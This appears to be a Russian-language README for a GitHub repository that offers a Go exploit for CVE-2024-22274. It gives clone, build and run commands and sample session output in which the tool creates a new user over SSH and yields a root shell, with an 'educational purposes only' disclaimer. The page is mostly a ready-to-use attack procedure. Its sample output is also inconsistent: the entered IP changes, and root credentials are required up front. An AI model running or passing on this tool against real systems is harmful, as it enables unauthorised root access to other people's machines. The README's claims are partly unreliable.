
Go-based exploit для CVE-2024-22274, который создает нового пользователя через SSH и предоставляет root-оболочку на целевой машине для авторизованного тестирования на проникновение.
Этот репозиторий содержит эксплойт для CVE-2024-22274. Эксплойт создаёт нового пользователя на удалённой машине через SSH и затем предоставляет рутовую оболочку.
Клонируйте репозиторий:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
Установите необходимые пакеты:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Скомпилируйте программу Go:
go build -o cve-2024-22274-rce main.go
Запустите скомпилированную программу:
./cve-2024-22274-rce
Следуйте подсказкам:
После создания пользователя вы получите рутовую оболочку на целевой машине. Вы сможете выполнять команды от имени нового пользователя.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
Отказ от ответственности Этот код предназначен только для образовательных целей. Используйте его ответственно и только на системах, на которые у вас есть разрешение тестировать.
Лицензия Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.